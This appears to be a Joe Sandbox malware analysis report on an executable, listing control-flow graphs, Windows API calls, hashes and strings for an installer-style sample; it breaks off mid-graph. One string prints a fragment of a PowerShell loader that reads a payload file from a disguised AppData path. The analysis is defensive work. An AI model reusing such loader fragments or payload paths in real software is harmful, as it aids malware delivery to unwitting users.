                                                                  control_flow_graph 116 40518a-4051a5 117 405336-40533d 116->117 118 4051ab-405274 GetDlgItem * 3 call 40401b call 4048e8 GetClientRect GetSystemMetrics SendMessageW * 2 116->118 120 405367-405374 117->120 121 40533f-405361 GetDlgItem CreateThread CloseHandle 117->121 141 405292-405295 118->141 142 405276-405290 SendMessageW * 2 118->142 123 405392-40539c 120->123 124 405376-40537c 120->124 121->120 127 4053f2-4053f6 123->127 128 40539e-4053a4 123->128 125 4053b7-4053c0 call 40404d 124->125 126 40537e-40538d ShowWindow * 2 call 40401b 124->126 138 4053c5-4053c9 125->138 126->123 127->125 135 4053f8-4053fe 127->135 131 4053a6-4053b2 call 403fbf 128->131 132 4053cc-4053dc ShowWindow 128->132 131->125 139 4053ec-4053ed call 403fbf 132->139 140 4053de-4053e7 call 40504b 132->140 135->125 136 405400-405413 SendMessageW 135->136 143 405515-405517 136->143 144 405419-405444 CreatePopupMenu call 405dc3 AppendMenuW 136->144 139->127 140->139 145 4052a5-4052bc call 403fe6 141->145 146 405297-4052a3 SendMessageW 141->146 142->141 143->138 153 405446-405456 GetWindowRect 144->153 154 405459-40546e TrackPopupMenu 144->154 155 4052f2-405313 GetDlgItem SendMessageW 145->155 156 4052be-4052d2 ShowWindow 145->156 146->145 153->154 154->143 157 405474-40548b 154->157 155->143 160 405319-405331 SendMessageW * 2 155->160 158 4052e1 156->158 159 4052d4-4052df ShowWindow 156->159 161 405490-4054ab SendMessageW 157->161 162 4052e7-4052ed call 40401b 158->162 159->162 160->143 161->161 163 4054ad-4054d0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 161->163 162->155 165 4054d2-4054f9 SendMessageW 163->165 165->165 166 4054fb-40550f GlobalUnlock SetClipboardData CloseClipboard 165->166 166->143
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 004051E9
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004051F8
                                                                  • GetClientRect.USER32(?,?), ref: 00405235
                                                                  • GetSystemMetrics.USER32(00000015), ref: 0040523D
                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 0040525E
                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040526F
                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405282
                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405290
                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004052A3
                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004052C5
                                                                  • ShowWindow.USER32(?,00000008), ref: 004052D9
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004052FA
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040530A
                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405323
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040532F
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405207
                                                                    • Part of subcall function 0040401B: SendMessageW.USER32(00000028,?,00000001,00403E47), ref: 00404029
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040534C
                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_0000511E,00000000), ref: 0040535A
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405361
                                                                  • ShowWindow.USER32(00000000), ref: 00405385
                                                                  • ShowWindow.USER32(?,00000008), ref: 0040538A
                                                                  • ShowWindow.USER32(00000008), ref: 004053D4
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                  • CreatePopupMenu.USER32 ref: 00405419
                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040542D
                                                                  • GetWindowRect.USER32(?,?), ref: 0040544D
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405466
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040549E
                                                                  • OpenClipboard.USER32(00000000), ref: 004054AE
                                                                  • EmptyClipboard.USER32 ref: 004054B4
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004054C0
                                                                  • GlobalLock.KERNEL32(00000000), ref: 004054CA
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004054DE
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004054FE
                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405509
                                                                  • CloseClipboard.USER32 ref: 0040550F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                  • String ID: {
                                                                  • API String ID: 590372296-366298937
                                                                  • Opcode ID: 203e9f1d86d533f2ebbe7f86b819a7276a20043a8637b95097349cfd405fd485
                                                                  • Instruction ID: 34766a67a8348c891c509fbed0d62983ec1eb8fa6b5cfd063670c437a0e1cb12
                                                                  • Opcode Fuzzy Hash: 203e9f1d86d533f2ebbe7f86b819a7276a20043a8637b95097349cfd405fd485
                                                                  • Instruction Fuzzy Hash: F5B12871800608FFDB119F60DD89AAE7B79FB48355F10803AFA41BA1A0CBB59E51DF58

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 408 405dc3-405dce 409 405dd0-405ddf 408->409 410 405de1-405df7 408->410 409->410 411 405dfd-405e0a 410->411 412 40600f-406015 410->412 411->412 413 405e10-405e17 411->413 414 40601b-406026 412->414 415 405e1c-405e29 412->415 413->412 417 406031-406032 414->417 418 406028-40602c call 405da1 414->418 415->414 416 405e2f-405e3b 415->416 419 405e41-405e7d 416->419 420 405ffc 416->420 418->417 422 405e83-405e8e GetVersion 419->422 423 405f9d-405fa1 419->423 424 40600a-40600d 420->424 425 405ffe-406008 420->425 426 405e90-405e94 422->426 427 405ea8 422->427 428 405fa3-405fa7 423->428 429 405fd6-405fda 423->429 424->412 425->412 426->427 432 405e96-405e9a 426->432 435 405eaf-405eb6 427->435 433 405fb7-405fc4 call 405da1 428->433 434 405fa9-405fb5 call 405ce8 428->434 430 405fe9-405ffa lstrlenW 429->430 431 405fdc-405fe4 call 405dc3 429->431 430->412 431->430 432->427 440 405e9c-405ea0 432->440 444 405fc9-405fd2 433->444 434->444 436 405eb8-405eba 435->436 437 405ebb-405ebd 435->437 436->437 442 405ef9-405efc 437->442 443 405ebf-405ee5 call 405c6e 437->443 440->427 445 405ea2-405ea6 440->445 449 405f0c-405f0f 442->449 450 405efe-405f0a GetSystemDirectoryW 442->450 456 405f84-405f88 443->456 457 405eeb-405ef4 call 405dc3 443->457 444->430 448 405fd4 444->448 445->435 452 405f95-405f9b call 406035 448->452 454 405f11-405f1f GetWindowsDirectoryW 449->454 455 405f7a-405f7c 449->455 453 405f7e-405f82 450->453 452->430 453->452 453->456 454->455 455->453 458 405f21-405f2b 455->458 456->452 461 405f8a-405f90 lstrcatW 456->461 457->453 463 405f45-405f5b SHGetSpecialFolderLocation 458->463 464 405f2d-405f30 458->464 461->452 465 405f76 463->465 466 405f5d-405f74 SHGetPathFromIDListW CoTaskMemFree 463->466 464->463 468 405f32-405f39 464->468 465->455 466->453 466->465 469 405f41-405f43 468->469 469->453 469->463
                                                                  APIs
                                                                  • GetVersion.KERNEL32(00000000,Completed,?,00405082,Completed,00000000,00000000,0041BB2D), ref: 00405E86
                                                                  • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00405F04
                                                                  • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00405F17
                                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405F53
                                                                  • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00405F61
                                                                  • CoTaskMemFree.OLE32(?), ref: 00405F6C
                                                                  • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F90
                                                                  • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405082,Completed,00000000,00000000,0041BB2D), ref: 00405FEA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                  • String ID: "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overs$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 900638850-3185010234
                                                                  • Opcode ID: a1d7122ea6a4abf59baf7160441808ad398ec4c15bbe5b84b7a9635c12faa1f0
                                                                  • Instruction ID: 51fea1f0525bd32aa09071eea97aa62567f0d70ed35b44e0f17875bb3ea282eb
                                                                  • Opcode Fuzzy Hash: a1d7122ea6a4abf59baf7160441808ad398ec4c15bbe5b84b7a9635c12faa1f0
                                                                  • Instruction Fuzzy Hash: 7561EE71A00A06ABDB209F64CC45AAF37A5EF54314F11C13BE941BA2E0D77D9A82CF4D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 470 405629-40564f call 4058f4 473 405651-405663 DeleteFileW 470->473 474 405668-40566f 470->474 475 4057e5-4057e9 473->475 476 405671-405673 474->476 477 405682-405692 call 405da1 474->477 479 405793-405798 476->479 480 405679-40567c 476->480 483 4056a1-4056a2 call 405838 477->483 484 405694-40569f lstrcatW 477->484 479->475 482 40579a-40579d 479->482 480->477 480->479 485 4057a7-4057af call 4060e4 482->485 486 40579f-4057a5 482->486 487 4056a7-4056ab 483->487 484->487 485->475 494 4057b1-4057c5 call 4057ec call 4055e1 485->494 486->475 490 4056b7-4056bd lstrcatW 487->490 491 4056ad-4056b5 487->491 493 4056c2-4056de lstrlenW FindFirstFileW 490->493 491->490 491->493 495 4056e4-4056ec 493->495 496 405788-40578c 493->496 512 4057c7-4057ca 494->512 513 4057dd-4057e0 call 40504b 494->513 499 40570c-405720 call 405da1 495->499 500 4056ee-4056f6 495->500 496->479 498 40578e 496->498 498->479 510 405722-40572a 499->510 511 405737-405742 call 4055e1 499->511 502 4056f8-405700 500->502 503 40576b-40577b FindNextFileW 500->503 502->499 507 405702-40570a 502->507 503->495 506 405781-405782 FindClose 503->506 506->496 507->499 507->503 510->503 515 40572c-405735 call 405629 510->515 523 405763-405766 call 40504b 511->523 524 405744-405747 511->524 512->486 514 4057cc-4057db call 40504b call 405c3b 512->514 513->475 514->475 515->503 523->503 526 405749-405759 call 40504b call 405c3b 524->526 527 40575b-405761 524->527 526->503 527->503
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,756F3420,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 00405652
                                                                  • lstrcatW.KERNEL32(0042F200,\*.*,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,756F3420,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 0040569A
                                                                  • lstrcatW.KERNEL32(?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,756F3420,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 004056BD
                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,756F3420,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 004056C3
                                                                  • FindFirstFileW.KERNEL32(0042F200,?,?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,756F3420,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 004056D3
                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405773
                                                                  • FindClose.KERNEL32(00000000), ref: 00405782
                                                                  Strings
                                                                  • "C:\Users\user\Desktop\yMXFgPOdf2.exe", xrefs: 00405632
                                                                  • \*.*, xrefs: 00405694
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405637
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\yMXFgPOdf2.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                  • API String ID: 2035342205-646213876
                                                                  • Opcode ID: eadf2b4e39dab2a9dc7f50b70c4bb88fb977d26753360483fc9983a540ea92ac
                                                                  • Instruction ID: 537a859ffcff897d8cd5f5cf56393fe58197ce41a03b0bffcce20e97483bf088
                                                                  • Opcode Fuzzy Hash: eadf2b4e39dab2a9dc7f50b70c4bb88fb977d26753360483fc9983a540ea92ac
                                                                  • Instruction Fuzzy Hash: 2441B230500A18E6DB21AB618D89EBF7778DF86719F14813BF805B21D1D77C4981EE6E
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,0040326C,00000008), ref: 0040611D
                                                                  • LoadLibraryA.KERNELBASE(?,?,00000020,0040326C,00000008), ref: 00406128
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406139
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                  • String ID:
                                                                  • API String ID: 310444273-0
                                                                  • Opcode ID: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                                  • Instruction ID: fdb84e6153f048f4f32cb56b497edeca1f79cb2b45eddc07a3c36f847a24315a
                                                                  • Opcode Fuzzy Hash: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                                  • Instruction Fuzzy Hash: D9E0CD326002309FC3105B34AE4497773AC9FA8740305043DF586F6000CB749C22EF69
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,00430248,0042FA00,0040593D,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,756F3420,00405649,?,C:\Users\user\AppData\Local\Temp\,756F3420), ref: 004060EF
                                                                  • FindClose.KERNEL32(00000000), ref: 004060FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID:
                                                                  • API String ID: 2295610775-0
                                                                  • Opcode ID: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                                  • Instruction ID: 5d70c47cb11938251a0a1db446d6214bf1d94b5ec034c03d4844f4bffd5ee079
                                                                  • Opcode Fuzzy Hash: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                                  • Instruction Fuzzy Hash: 1DD012755540309BD7805738AE0C84B7A59AF193317224B36F46AF62E0D7788C66869C

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 167 40376b-403783 call 40610b 170 403785-403795 call 405ce8 167->170 171 403797-4037ce call 405c6e 167->171 180 4037f1-40381a call 403a41 call 4058f4 170->180 176 4037d0-4037e1 call 405c6e 171->176 177 4037e6-4037ec lstrcatW 171->177 176->177 177->180 185 403820-403825 180->185 186 4038ac-4038b4 call 4058f4 180->186 185->186 187 40382b-403853 call 405c6e 185->187 192 4038c2-4038e7 LoadImageW 186->192 193 4038b6-4038bd call 405dc3 186->193 187->186 194 403855-403859 187->194 196 403968-403970 call 40140b 192->196 197 4038e9-403919 RegisterClassW 192->197 193->192 198 40386b-403877 lstrlenW 194->198 199 40385b-403868 call 405819 194->199 211 403972-403975 196->211 212 40397a-403985 call 403a41 196->212 200 403a37 197->200 201 40391f-403963 SystemParametersInfoW CreateWindowExW 197->201 205 403879-403887 lstrcmpiW 198->205 206 40389f-4038a7 call 4057ec call 405da1 198->206 199->198 203 403a39-403a40 200->203 201->196 205->206 210 403889-403893 GetFileAttributesW 205->210 206->186 215 403895-403897 210->215 216 403899-40389a call 405838 210->216 211->203 220 40398b-4039a8 ShowWindow LoadLibraryW 212->220 221 403a0e-403a0f call 40511e 212->221 215->206 215->216 216->206 222 4039b1-4039c3 GetClassInfoW 220->222 223 4039aa-4039af LoadLibraryW 220->223 227 403a14-403a16 221->227 225 4039c5-4039d5 GetClassInfoW RegisterClassW 222->225 226 4039db-4039fe DialogBoxParamW call 40140b 222->226 223->222 225->226 233 403a03-403a0c call 4036bb 226->233 229 403a30-403a32 call 40140b 227->229 230 403a18-403a1e 227->230 229->200 230->211 231 403a24-403a2b call 40140b 230->231 231->211 233->203
                                                                  APIs
                                                                    • Part of subcall function 0040610B: GetModuleHandleA.KERNEL32(?,?,00000020,0040326C,00000008), ref: 0040611D
                                                                    • Part of subcall function 0040610B: LoadLibraryA.KERNELBASE(?,?,00000020,0040326C,00000008), ref: 00406128
                                                                    • Part of subcall function 0040610B: GetProcAddress.KERNEL32(00000000,?), ref: 00406139
                                                                  • lstrcatW.KERNEL32(1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,756F3420,00000000,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 004037EC
                                                                  • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040386C
                                                                  • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000), ref: 0040387F
                                                                  • GetFileAttributesW.KERNEL32(: Completed), ref: 0040388A
                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe), ref: 004038D3
                                                                    • Part of subcall function 00405CE8: wsprintfW.USER32 ref: 00405CF5
                                                                  • RegisterClassW.USER32(00433E40), ref: 00403910
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403928
                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040395D
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403993
                                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 004039A4
                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 004039AF
                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433E40), ref: 004039BF
                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00433E40), ref: 004039CC
                                                                  • RegisterClassW.USER32(00433E40), ref: 004039D5
                                                                  • DialogBoxParamW.USER32(?,00000000,00403B0E,00000000), ref: 004039F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: "C:\Users\user\Desktop\yMXFgPOdf2.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$@>C$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                  • API String ID: 914957316-3112137479
                                                                  • Opcode ID: 32e94d17401de2a7c1f379b3f747c88ae1515776f88dc3b4970cf19dbaf980bf
                                                                  • Instruction ID: 9058ea0fac2f7b5828f11579708a501ddeab19906f501c4d7d338e07c4ff49df
                                                                  • Opcode Fuzzy Hash: 32e94d17401de2a7c1f379b3f747c88ae1515776f88dc3b4970cf19dbaf980bf
                                                                  • Instruction Fuzzy Hash: 2761B871600700AFD720BF669D46F2B3A6CEB84B4AF50443FF940B62E1CBB95941CA2D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 238 403b0e-403b20 239 403c61-403c70 238->239 240 403b26-403b2c 238->240 242 403c72-403cba GetDlgItem * 2 call 403fe6 SetClassLongW call 40140b 239->242 243 403cbf-403cd4 239->243 240->239 241 403b32-403b3b 240->241 244 403b50-403b53 241->244 245 403b3d-403b4a SetWindowPos 241->245 242->243 247 403d14-403d19 call 404032 243->247 248 403cd6-403cd9 243->248 250 403b55-403b67 ShowWindow 244->250 251 403b6d-403b73 244->251 245->244 257 403d1e-403d39 247->257 253 403cdb-403ce6 call 401389 248->253 254 403d0c-403d0e 248->254 250->251 258 403b75-403b8a DestroyWindow 251->258 259 403b8f-403b92 251->259 253->254 269 403ce8-403d07 SendMessageW 253->269 254->247 256 403fb3 254->256 264 403fb5-403fbc 256->264 262 403d42-403d48 257->262 263 403d3b-403d3d call 40140b 257->263 265 403f90-403f96 258->265 267 403b94-403ba0 SetWindowLongW 259->267 268 403ba5-403bab 259->268 272 403f71-403f8a DestroyWindow EndDialog 262->272 273 403d4e-403d59 262->273 263->262 265->256 270 403f98-403f9e 265->270 267->264 274 403bb1-403bc2 GetDlgItem 268->274 275 403c4e-403c5c call 40404d 268->275 269->264 270->256 279 403fa0-403fa9 ShowWindow 270->279 272->265 273->272 280 403d5f-403dac call 405dc3 call 403fe6 * 3 GetDlgItem 273->280 276 403be1-403be4 274->276 277 403bc4-403bdb SendMessageW IsWindowEnabled 274->277 275->264 281 403be6-403be7 276->281 282 403be9-403bec 276->282 277->256 277->276 279->256 308 403db6-403df2 ShowWindow 